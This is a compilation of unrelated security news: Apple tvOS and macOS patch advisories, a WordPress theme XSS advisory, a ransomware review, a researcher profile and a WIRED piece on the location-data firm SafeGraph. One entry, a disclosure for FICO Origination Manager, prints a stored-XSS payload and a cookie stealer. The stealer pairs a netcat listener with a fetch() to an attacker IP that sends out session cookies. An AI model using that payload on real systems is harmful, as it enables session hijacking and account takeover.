The issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.3, tvOS 16.4, watchOS 9.4, iOS 16.4 and iPadOS 16.4. An app may be able to execute arbitrary code with kernel privileges

Released March 27, 2023

**AppleMobileFileIntegrity**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: A user may gain access to protected parts of the file system

Description: The issue was addressed with improved checks.

CVE-2023-23527: Mickey Jin (@patch1t)

**Core Bluetooth**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing a maliciously crafted Bluetooth packet may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2023-23528: Jianjun Dai and Guang Gong of 360 Vulnerability Research Institute

**CoreCapture**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-28181: Tingting Yin of Tsinghua University

**FontParser**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-27956: Ye Zhang of Baidu Security

**Foundation**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Parsing a maliciously crafted plist may lead to an unexpected app termination or arbitrary code execution

Description: An integer overflow was addressed with improved input validation.

CVE-2023-27937: an anonymous researcher

**Identity Services**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to access information about a user’s contacts

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-27928: Csaba Fitzl (@theevilbit) of Offensive Security

**ImageIO**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-23535: ryuzaki

**ImageIO**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-27929: Meysam Firouzi (@R00tkitSMM) of Mbition Mercedes-Benz Innovation Lab and  jzhu working with Trend Micro Zero Day Initiative

**Kernel**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2023-27969: Adam Doupé of ASU SEFCOM

**Kernel**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-27933: sqrtpwn

**Podcasts**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to access user-sensitive data

Description: The issue was addressed with improved checks.

CVE-2023-27942: Mickey Jin (@patch1t)

**TCC**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to access user-sensitive data

Description: This issue was addressed by removing the vulnerable code.

CVE-2023-27931: Mickey Jin (@patch1t)

**WebKit**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing maliciously crafted web content may bypass Same Origin Policy

Description: This issue was addressed with improved state management.

WebKit Bugzilla: 248615  
CVE-2023-27932: an anonymous researcher

**WebKit**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: A website may be able to track sensitive user information

Description: The issue was addressed by removing origin information.

WebKit Bugzilla: 250837  
CVE-2023-27954: an anonymous researcher

CVE-2023-28181: About the security content of tvOS 16.4

A privacy issue was addressed by moving sensitive data to a more secure location. This issue is fixed in macOS Ventura 13.3. An app may be able to access user-sensitive data

Released March 27, 2023

**AMD**

Available for: macOS Ventura

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2023-27968: ABC Research s.r.o.

**Apple Neural Engine**

Available for: macOS Ventura

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with improved checks.

CVE-2023-23532: Mohamed Ghannam (@\_simo36)

**AppleMobileFileIntegrity**

Available for: macOS Ventura

Impact: A user may gain access to protected parts of the file system

Description: The issue was addressed with improved checks.

CVE-2023-23527: Mickey Jin (@patch1t)

**AppleMobileFileIntegrity**

Available for: macOS Ventura

Impact: An app may be able to access user-sensitive data

Description: This issue was addressed by removing the vulnerable code.

CVE-2023-27931: Mickey Jin (@patch1t)

**Archive Utility**

Available for: macOS Ventura

Impact: An archive may be able to bypass Gatekeeper

Description: The issue was addressed with improved checks.

CVE-2023-27951: Brandon Dalton (@partyD0lphin) of Red Canary and Csaba Fitzl (@theevilbit) of Offensive Security

Entry updated May 1, 2023

**Calendar**

Available for: macOS Ventura

Impact: Importing a maliciously crafted calendar invitation may exfiltrate user information

Description: Multiple validation issues were addressed with improved input sanitization.

CVE-2023-27961: Rıza Sabuncu - twitter.com/rizasabuncu

**Camera**

Available for: macOS Ventura

Impact: A sandboxed app may be able to determine which app is currently using the camera

Description: The issue was addressed with additional restrictions on the observability of app states.

CVE-2023-23543: Yiğit Can YILMAZ (@yilmazcanyigit)

**Carbon Core**

Available for: macOS Ventura

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved checks.

CVE-2023-23534: Mickey Jin (@patch1t)

**ColorSync**

Available for: macOS Ventura

Impact: An app may be able to read arbitrary files

Description: The issue was addressed with improved checks.

CVE-2023-27955: JeongOhKyea

**CommCenter**

Available for: macOS Ventura

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2023-27936: Tingting Yin of Tsinghua University

**CoreCapture**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-28181: Tingting Yin of Tsinghua University

**curl**

Available for: macOS Ventura

Impact: Multiple issues in curl

Description: Multiple issues were addressed by updating curl.

CVE-2022-43551

CVE-2022-43552

**dcerpc**

Available for: macOS Ventura

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: A memory initialization issue was addressed.

CVE-2023-27934: Aleksandar Nikolic of Cisco Talos

**dcerpc**

Available for: macOS Ventura

Impact: A user in a privileged network position may be able to cause a denial-of-service

Description: A denial-of-service issue was addressed with improved memory handling.

CVE-2023-28180: Aleksandar Nikolic of Cisco Talos

**dcerpc**

Available for: macOS Ventura

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: The issue was addressed with improved bounds checks.

CVE-2023-27935: Aleksandar Nikolic of Cisco Talos

**dcerpc**

Available for: macOS Ventura

Impact: A remote user may be able to cause unexpected system termination or corrupt kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2023-27953: Aleksandar Nikolic of Cisco Talos

CVE-2023-27958: Aleksandar Nikolic of Cisco Talos

**Display**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2023-27965: Proteas of Pangu Lab

**FaceTime**

Available for: macOS Ventura

Impact: An app may be able to access user-sensitive data

Description: A privacy issue was addressed by moving sensitive data to a more secure location.

CVE-2023-28190: Joshua Jones

**Find My**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-23537: an anonymous researcher

**FontParser**

Available for: macOS Ventura

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-27956: Ye Zhang of Baidu Security

**Foundation**

Available for: macOS Ventura

Impact: Parsing a maliciously crafted plist may lead to an unexpected app termination or arbitrary code execution

Description: An integer overflow was addressed with improved input validation.

CVE-2023-27937: an anonymous researcher

**iCloud**

Available for: macOS Ventura

Impact: A file from an iCloud shared-by-me folder may be able to bypass Gatekeeper

Description: This was addressed with additional checks by Gatekeeper on files downloaded from an iCloud shared-by-me folder.

CVE-2023-23526: Jubaer Alnazi of TRS Group of Companies

**Identity Services**

Available for: macOS Ventura

Impact: An app may be able to access information about a user’s contacts

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-27928: Csaba Fitzl (@theevilbit) of Offensive Security

**ImageIO**

Available for: macOS Ventura

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-23535: ryuzaki

**ImageIO**

Available for: macOS Ventura

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-27929: Meysam Firouzi (@R00tkitSMM) of Mbition Mercedes-Benz Innovation Lab and jzhu working with Trend Micro Zero Day Initiative

**ImageIO**

Available for: macOS Ventura

Impact: Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2023-27946: Mickey Jin (@patch1t)

**ImageIO**

Available for: macOS Ventura

Impact: Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2023-27957: Yiğit Can YILMAZ (@yilmazcanyigit)

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved bounds checks.

CVE-2023-23536: Félix Poulin-Bélanger

Entry added May 1, 2023

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2023-23514: Xinru Chi of Pangu Lab and Ned Williamson of Google Project Zero

CVE-2023-27969: Adam Doupé of ASU SEFCOM

**Kernel**

Available for: macOS Ventura

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-27933: sqrtpwn

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to disclose kernel memory

Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation.

CVE-2023-27941: Arsenii Kostromin (0x3c3e)

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to disclose kernel memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2023-28200: Arsenii Kostromin (0x3c3e)

**LaunchServices**

Available for: macOS Ventura

Impact: Files downloaded from the internet may not have the quarantine flag applied

Description: This issue was addressed with improved checks.

CVE-2023-27943: an anonymous researcher, Brandon Dalton, Milan Tenk, and Arthur Valiev

**LaunchServices**

Available for: macOS Ventura

Impact: An app may be able to gain root privileges

Description: This issue was addressed with improved checks.

CVE-2023-23525: Mickey Jin (@patch1t)

**Mail**

Available for: macOS Ventura

Impact: An app may be able to view sensitive information

Description: The issue was addressed with improved checks.

CVE-2023-28189: Mickey Jin (@patch1t)

Entry added May 1, 2023

**Model I/O**

Available for: macOS Ventura

Impact: Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-27949: Mickey Jin (@patch1t)

**NetworkExtension**

Available for: macOS Ventura

Impact: A user in a privileged network position may be able to spoof a VPN server that is configured with EAP-only authentication on a device

Description: The issue was addressed with improved authentication.

CVE-2023-28182: Zhuowei Zhang

**PackageKit**

Available for: macOS Ventura

Impact: An app may be able to modify protected parts of the file system

Description: A logic issue was addressed with improved checks.

CVE-2023-23538: Mickey Jin (@patch1t)

CVE-2023-27962: Mickey Jin (@patch1t)

**Photos**

Available for: macOS Ventura

Impact: Photos belonging to the Hidden Photos Album could be viewed without authentication through Visual Lookup

Description: A logic issue was addressed with improved restrictions.

CVE-2023-23523: developStorm

**Podcasts**

Available for: macOS Ventura

Impact: An app may be able to access user-sensitive data

Description: The issue was addressed with improved checks.

CVE-2023-27942: Mickey Jin (@patch1t)

**Safari**

Available for: macOS Ventura

Impact: An app may bypass Gatekeeper checks

Description: A race condition was addressed with improved locking.

CVE-2023-27952: Csaba Fitzl (@theevilbit) of Offensive Security

**Sandbox**

Available for: macOS Ventura

Impact: An app may be able to modify protected parts of the file system

Description: A logic issue was addressed with improved checks.

CVE-2023-23533: Mickey Jin (@patch1t), Koh M. Nakagawa of FFRI Security, Inc., and Csaba Fitzl (@theevilbit) of Offensive Security

**Sandbox**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: A logic issue was addressed with improved validation.

CVE-2023-28178: Yiğit Can YILMAZ (@yilmazcanyigit)

**SharedFileList**

Available for: macOS Ventura

Impact: An app may be able to break out of its sandbox

Description: The issue was addressed with improved checks.

CVE-2023-27966: an anonymous researcher

Entry added May 1, 2023

**Shortcuts**

Available for: macOS Ventura

Impact: A shortcut may be able to use sensitive data with certain actions without prompting the user

Description: The issue was addressed with additional permissions checks.

CVE-2023-27963: Jubaer Alnazi Jabin of TRS Group Of Companies, and Wenchao Li and Xiaolong Bai of Alibaba Group

**System Settings**

Available for: macOS Ventura

Impact: An app may be able to access user-sensitive data

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-23542: an anonymous researcher

**System Settings**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: A permissions issue was addressed with improved validation.

CVE-2023-28192: Guilherme Rambo of Best Buddy Apps (rambo.codes)

**TCC**

Available for: macOS Ventura

Impact: An app may be able to access user-sensitive data

Description: This issue was addressed by removing the vulnerable code.

CVE-2023-27931: Mickey Jin (@patch1t)

**Vim**

Available for: macOS Ventura

Impact: Multiple issues in Vim

Description: Multiple issues were addressed by updating to Vim version 9.0.1191.

CVE-2023-0049

CVE-2023-0051

CVE-2023-0054

CVE-2023-0288

CVE-2023-0433

CVE-2023-0512

**WebKit Web Inspector**

Available for: macOS Ventura

Impact: A remote attacker may be able to cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved state management.

CVE-2023-28201: Dohyun Lee (@l33d0hyun) and crixer (@pwning\_me) of SSD Labs

Entry added May 1, 2023

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may bypass Same Origin Policy

Description: This issue was addressed with improved state management.

CVE-2023-27932: an anonymous researcher

**WebKit**

Available for: macOS Ventura

Impact: A website may be able to track sensitive user information

Description: The issue was addressed by removing origin information.

CVE-2023-27954: an anonymous researcher

**XPC**

Available for: macOS Ventura

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with a new entitlement.

CVE-2023-27944: Mickey Jin (@patch1t)

CVE-2023-28190: About the security content of macOS Ventura 13.3

Auth (subscriber+) Reflected Cross-Site Scripting (XSS) vulnerability in Macho Themes NewsMag theme <= 2.4.4 versions.

**Solution**

Deactivate and delete. No reply from the vendor.

Brandon Roldan discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Newsmag Theme. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**2 other known vulnerabilities for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-28493: WordPress NewsMag theme <= 2.4.4 - Reflected Cross-Site Scripting (XSS) vulnerability - Patchstack

Multiple persistent cross site scripting vulnerabilities in FICO Origination Manager Decision Module version 4.8.1 allow an attacker to execute code in the context of the victim's browser using a crafted payload. Additionally, an attacker with initial access to the application, can get the JSESSIONID cookie of another user and take over their session. These two findings can be chained together.

    # Exploit Title: Stored-XSS in FICO Origination Manager Decision Module 4.8.1 Leads to Session Hijacking# Date: 2023-05-07# Exploit Author: Matei Josephs# Vendor Homepage: https://www.fico.com/# Version: FICO Origination Manager Decision Module 4.8.1# CVE : CVE-2023-30056, CVE-2023-30057Introduction=================Multiple stored cross-site scripting (XSS) vulnerabilities in FICO Origination Manager Decision Module 4.8.1 allow to execute code in the context of the victim's browser using a crafted payload. Additionally, an attacker with initial access to the application, can get the JSESSIONID cookie of another user and take over their session. These two findings can be chained together.Proof of Concept=================All description fields when adding Categories and Products, Product Strategies, Decision Flows, Data Object References, Data Methods, Data Method Sequences, Rulesets, Decision Tables, Decision Trees, Score Models, Scenarios, or Internal Services are vulnerable to a stored XSS using the following payload:   <img/src/onerror=prompt(document.cookie)>An attacker could implement a cookie stealer as follows:  On the attacker's machine:    nc -lvnp <PORT>  In one of the vulnerable description fields:    <img/src/onerror=fetch('http://<ATTACKER-IP>:<PORT>/'+document.cookie)>When a victim would visit the page where the payload was injected, the attacker would receive their JSESSIONID cookie. The attacker could then use the JSESSIONID cookie to log into the Origination Manager Decision Module as the victim.

FICO Origination Manager Decision Module 4.8.1 XSS / Session Hijacking

LockBit maintained its position as the top ransomware attacker and was also observed expanding into the Mac space. 



(Read more...)




The post Ransomware review: May 2023 appeared first on Malwarebytes Labs.

_This article is based on research by Marcelo Rivero, Malwarebytes' ransomware specialist, who monitors information published by ransomware gangs on their Dark Web sites. In this report, "known attacks" are those where the victim didn't pay a ransom. This provides the best overall picture of ransomware activity, but the true number of attacks is far higher._

In April, LockBit maintained its position as the top ransomware attacker and was also observed expanding into the Mac space. Meanwhile, Cl0p, which dramatically expanded its attack operations in March, has gone quiet this month, despite Microsoft observing them exploiting PaperCut vulnerabilities.

LockBit's macOS ransomware is an interesting development in the threat landscape, showing that the group is dipping its toes into the historically ransomware-free Mac environment. The variant, targeting macOS arm64 architecture, first appeared on VirusTotal in November and December 2022 but went unnoticed until late April when it was discovered by MalwareHunterTeam. 

The LockBit macOS samples analyzed by Malwarebytes seem ineffective due to being unsigned, not accounting for TCC/SIP restrictions, and being riddled with bugs, like buffer overflows, causing premature termination when executed on macOS.

“The LockBit encryptor doesn’t look particularly viable in its current form, but I’m definitely going to be keeping an eye on it,” says Thomas Reed, director of Mac and mobile platforms at Malwarebytes. “The viability may improve in the future. Or it may not, if their tests aren’t promising.”

Keep an eye out, because LockBit's work in developing a macOS ransomware variant—plagued though it may currently be—could signal a trend toward more Mac-targeting ransomware in the future.

Known ransomware attacks by gang, April 2023

Known ransomware attacks by country, April 2023

Known ransomware attacks by industry sector, April 2023

**Cl0p** ransomware, which gained prominence in March by exploiting a zero-day vulnerability in GoAnywhere MFT, went comparatively silent with just four attacks in April. Nevertheless, the gang was seen last month exploiting vulnerabilities in PaperCut servers to steal corporate data. 

PaperCut is a popular printing management software which was targeted by both Cl0p and LockBit in April using two gnarly vulnerabilities: one allowing remote code execution (CVE-2023-27350) and the other enabling information disclosure (CVE-2023-27351). Once gaining initial access, Cl0p members sneakily deploy the TrueBot malware and a Cobalt Strike beacon to creep through the network, grabbing data along the way. 

Cl0p clearly has a history of exploiting platforms like Accellion FTA and GoAnywhere MFT, and now they've set their sights on PaperCut. So, if you're using PaperCut MF or NG, upgrade pronto and patch these two vulnerabilities!

**Vice Society**, notorious for targeting the education sector, has recently advanced their operations by adopting a sneaky PowerShell script for automated data theft. Discovered by Palo Alto Networks Unit 42, the new data exfiltration tool cleverly employs "living off the land" (LOTL) techniques to avoid detection. For instance, the script employs system-native cmdlets to search and exfiltrate data, minimizing its footprint and maintaining a low profile.

Separately, the **Play** ransomware group has whipped up two fancy .NET tools, Grixba and VSS Copying Tool, to make their cyberattacks more effective.

Grixba checks for antivirus programs, EDR suites, backup tools to help them plan the next steps of the attack. VSS Copying Tool, meanwhile, tiptoes around the Windows Volume Shadow Copy Service (VSS) to steal files from system snapshots and backup copies. Both tools were cooked up with the Costura .NET development tool for easy deployment on their victims' systems.

As Vice Society, Play, and other ransomware groups increasingly adopt advanced LOTL methods and sophisticated tools like Grixba, the capacity to proactively identify both malicious tools and the malicious use of legitimate tools within a network will undoubtedly become the deciding factor in an organization's defense strategy moving forward.

As for other trends, the USA still tops the charts as the most affected country, with the services industry getting the brunt of the attacks, as both have been the case all year. The **education sector** has its highest number of attackers (21) since January. Meanwhile, the **healthcare sector** saw a huge surge in attacks (37) in April, the highest it's been all year.

**New players****Akira**

Akira is a fresh ransomware hitting enterprises globally since March 2023, having already published in April the data of nine companies across different sectors like education, finance, and manufacturing. When executed, the ransomware deletes Windows Shadow Volume Copies, encrypts files with specific extensions, and appends the .akira extension to the encrypted files.

Like most ransomware gangs these days, the Akira gang steals corporate data before encrypting files for the purposes of double-extortion. So far, the leaked info published on their leak site—which looks retro and lets you navigate with typed commands—ranges from 5.9 GB to a whopping 259 GB.

Akira demands ransoms from $200,000 to millions of dollars, and it seems they are willing to lower ransom demands for companies that only want to prevent the leaking of stolen data without needing a decryptor.

**CrossLock**

CrossLock is a new ransomware strain using the Go programming language, which makes it more difficult to reverse engineer and boosts its compatibility across platforms. 

The ransomware employs tactics to avoid analysis, such as looking for the WINE environment (to determine if their ransomware is being executed within an analysis or sandbox environment) and tweaking Event Tracing for Windows (ETW) functions (to disrupt the flow of information that security tools and analysts rely on to identify suspicious behavior).

In April, the CrossLock Ransomware Group said they targeted Valid Certificadora, a Brazilian IT & ITES company.

**Trigona**

Trigona ransomware emerged in October 2022 and has targeted various sectors worldwide, including six in April. Operators use tools like NetScan, Splashtop, and Mimikatz to gain access, perform reconnaissance, and gather sensitive information from target systems. They also employ batch scripts to create new user accounts, disable security features, and cover their tracks. 

**Dunghill Leak**

Dunghill Leak is a new ransomware that evolved from the Dark Angels ransomware, which itself came from Babuk ransomware. In April it published the data of two companies, including Incredible Technologies, an American developer and manufacturer of coin-operated video games. The Dunghill Leak gang claims they have access to 500 GB of the company's data, including game files and tax payment reports. Researchers think Dunghill Leak is just a rebranded Dark Angels.

**Money Message**

Money Message is a new ransomware which targets both Windows and Linux systems. In April, criminals used Money Message to hit at least 10 victims, mostly in the US and from various industries. The gang also targeted some big-time companies worth billions of dollars, such as Taiwanese PC parts maker MSI (Micro-Star International).

Money Message uses advanced encryption techniques and leaves a ransom note called "money\_message.log." 

Our Ransomware Emergency Kit contains the information you need to defend against ransomware-as-a-service (RaaS) gangs.

**How to avoid ransomware**

*   **Block common forms of entry.** Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
*   **Prevent intrusions.** Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
*   **Detect intrusions.** Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption.** Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
*   **Create offsite, offline backups.** Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Don’t get attacked twice.** Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Ransomware review: May 2023

Today, Finn combs through Talos’ various intelligence sources, open-source research, partner resources, and Cisco product telemetry to track major attacker trends and emerging threats.

Monday, May 8, 2023 08:05

After working in government for several years, this Talos threat hunter is diving into the dark web

Growing up, Jacob Finn says he wanted to be a detective (or maybe a veterinarian, but there’s still plenty of time for that).

Today with Talos, he’s a detective. And while he’s still hunting for bad actors, instead of combing crime scenes for clues, he’s reading and analyzing dark web forums, leveraging open-source intelligence, and exploiting network telemetry for signs of where adversaries are headed next.

He works on Talos’ Threat Intelligence and Interdiction team as a strategic analyst, which in his words, “looks at the cyber threat landscape from a 30,000-foot view.” A huge part of Finn’s job is writing threat assessments and alerts for intelligence partners, customers, and cyber-attack victims. He’s also a major advocate of public-private partnerships across the cybersecurity ecosystem.

So, it’s fitting that Finn has always had one foot in the public sphere even while transitioning to work in the private sector.

Finn started his cybersecurity career as the Cybersecurity Policy Director for Los Angeles Mayor Eric Garcetti during Garcetti’s second term, working on new intelligence-sharing agreements between L.A. and other major cities with similar security concerns, helping the mayor write cybersecurity-related policies, and advocating for the government to improve its defensive capabilities.

Finn (center) speaking at a panel on behalf of Los Angeles Mayor Eric Garcetti in 2019.

But Finn says he “never expected cybersecurity to be in my long-term plan.”

After receiving his bachelor's degree from the University of California, Los Angeles (UCLA), he attended Reichman University in Herzliya, Israel to receive a master’s in homeland security and counterterrorism, the field he believed he’d make a career of. As part of the curriculum, Finn studied cyberterrorism, which drew him to research how global terrorist organizations use the Internet to advance their operations. He received the offer to advise the mayor in the L.A. Mayor’s Office of Public Safety upon returning home to California.

Finn worked for the Garcetti administration at a time when other major cities like Atlanta were dealing with massive, impactful ransomware attacks. One initiative he led involved working with two of L.A.’s sister cities — Auckland, New Zealand and Guangzhou, China — to establish a multilateral agreement regarding emerging security threats and natural disasters.

Finn (far left) at the signing of an information-sharing agreement between Los Angeles, Auckland, New Zealand and Guangzhou, China in 2019.

“Part of it was devising best practices to protect our communities from major emergencies, which included building mechanisms for information-sharing,” Finn said. “I think this just shows how important cities are in terms of leading the way in security policy and preparation… at the federal government, it’s all about funding and national-level policy, but you don’t actually see how that is implemented at the local level.”

Finn eventually took a job with the U.S. Department of Defense. After years of building expertise in intelligence and national security, he then decided to head into the private sector, applying for a job as a strategic intelligence analyst with Talos.

Today, Finn combs through Talos’ various intelligence sources, open-source research, partner resources, and Cisco product telemetry to track major attacker trends and emerging threats. He has mostly focused on state-sponsored actors and threats stemming from criminal groups.

This research eventually takes the form of public reports, customer alerts, and intelligence that’s shared with Talos’ detection teams to create defensive content for Cisco Secure products. Finn and his team were heavily involved in the creation of Talos’ first-ever Year in Review report, which recapped the major attacker trends in 2022.

Finn brings his public government experience to the role by knowing the importance of information-sharing and what types of security concerns are relevant to practitioners who are tasked with defending municipalities and important public services. But he also had to learn many of the technical skills on the job once he started at Talos — he jokes that he had never opened Terminal on Mac before his first day on the job.

“Everyone at Talos understands that each person comes from different backgrounds with different skills or contributions, and may not have the same level of technical knowledge,” he said. “And now I feel very comfortable using Talos’ different tools to look through datasets such and endpoint logs and other network telemetry.”

Finn still spends a lot of time thinking about the implications of security trends, though, and how that affects the American public.

He recently participated in a pitch competition (think “Shark Tank” but for national security policy) with the Center for the New American Security, a high-profile Washington, D.C. national security think tank. Finn’s idea that he shared with the panel involved a new cybersecurity certification program that private companies could apply for.

Finn’s idea involves a set of standards that private companies could adhere to regarding security measures, verification methods and other cybersecurity protocols they use to protect personal information.

“If a company which sells a service or product involving storage of sensitive data such as PII \[personally identifiable information\] or attorney-client privileged information, you as the consumer want to be satisfied that the company is meeting a certain level of standards so they’re less likely get breached,” Finn said. “This certification program is built on the underlying assumption that companies that are profit-driven, will seek to adopt stronger security standards if consumers are demanding it.”

You can watch Finn’s full pitch to the CNAS panel below.

It’s that type of broader thinking and thought leadership that makes Finn a perfect teammate for the Strategic Analysis team. Rather than diving into the nitty-gritty of a tactical malware campaign or a specific botnet, Finn is taking in information from all directions to try and figure out what’s going to be the next big threat or trend in the security landscape. This all goes to show that researchers with a variety of skillsets can still contribute to Cisco Talos’ defenses.

Researcher Spotlight: Jacob Finn creates his own public-private partnership at Talos

Documents obtained by WIRED show SafeGraph, which sold location data related to Planned Parenthood visits, is now pursuing contracts with the US Air Force.

In its early years, SafeGraph sold direct access to individualized location traces tied to device IDs. SafeGraph has historically denied any links to law enforcement. “Contrary to some belief, we don’t have any law enforcement customers,” Hoffman, the founder, wrote in 2022. However, this kind of data, sold by other vendors, has reportedly been purchased by the FBI, Immigration and Customs Enforcement, and local police. 

In 2019, it spun off a subsidiary company called Veraset, which took over SafeGraph’s relationships with data providers, such as apps and other data brokers, and its business selling individualized data. The SafeGraph brand then shifted to selling aggregated and processed products based in part on Veraset’s raw data.

The AFWERX contract is the first publicly reported relationship between SafeGraph and the US military, but the company has a history of working with other government agencies. In 2018, it sold two years of raw data to the Illinois Department of Transportation. In the first months of the Covid-19 pandemic, it inked a $420,000 deal with the Centers for Disease Control. Meanwhile, Veraset gave raw, individualized data about millions of people to the Washington, DC, Department of Health and other agencies around the country. And in 2020 and 2021, Santa Clara County used SafeGraph data to monitor attendance at a local church as part of a broader effort to enforce Covid restrictions. Materials shared with the Air Force mention relationships with the US Department of Agriculture, the Federal Reserve Bank, and the Los Angeles County, New York City, and New Jersey governments. 

SafeGraph has also shown interest in the homeland security business. In 2022, it cosponsored the Institute for Defense and Government Advancement’s Homeland Security Week, a trade show and expo that connects security contractors with top federal and local law enforcement officials. In a joint video presentation with Department of Homeland Security contractor GoTenna, a SafeGraph representative advertised “strategic intelligence” to help border patrol agents monitor US “points of entry” and areas that can’t be watched in other ways. 

In May 2022, Vice revealed that SafeGraph was selling access to aggregated counts of where people were before and after visiting abortion clinics, including Planned Parenthood. In response, 14 US senators sent the company a letter demanding answers about its business practices, and SafeGraph promised to stop selling data about abortion clinic visitors.

Although SafeGraph is best known for dealing in cell-phone-based location data, its pitch to the Air Force makes little mention of data about human movement—the only direct reference is a slide that says it can help “analyze human activity for Landing Zone (LZ) selection,” without explaining what that means. But SafeGraph has recently expanded its business to incorporate other kinds of data as well. For example, in 2022, it launched Spend, a product that profiles the customers of brick-and-mortar stores, including what they spend, what wireless carriers they use, and whether they take out short-term “buy now, pay later” loans. 

In its slide deck for the Air Force, SafeGraph also claims to use a “global language model” able to “ingest data from 193 countries” and “100+ languages” to augment its data about physical places using “web-crawling and Machine Learning.” In response to a question about outstanding challenges, it said it plans to build “deeper language models” to help it gather data about places of interest to the Air Force, such as the Middle East.

SafeGraph is funded in part by the CIA-backed venture capital firm In-Q-Tel, and In-Q-Tel head of investments George Hoyem sits on SafeGraph’s board, according to its slide deck. SafeGraph has also received investments from a motley crew including Peter Thiel, Sam Harris, former Republican House majority leader Eric Cantor, and former Saudi Arabian intelligence chief Prince Turki bin Faisal Al Saud. SafeGraph’s last funding round valued the company at $370 million, according to the records.

In a post-contract questionnaire, SafeGraph told AFWERX it had met eight times with various parts of the Air Force to discuss the use of its products. It now plans to apply for a larger Phase 2 contract with the Air Force in the third quarter of 2023, targeting Task Force 99 of the Al Udeid Air Base in Qatar. The records also mention the possibility of a facility security clearance, which would allow SafeGraph to access classified information directly.

SafeGraph Lands US Air Force Contract After Targeting Abortion Clinics

This week on Lock and Code, we speak with Allan Liska about a new trend in ransomware delivery and development, and why it presents new challenges to organizations and law enforcement investigators. 



(Read more...)




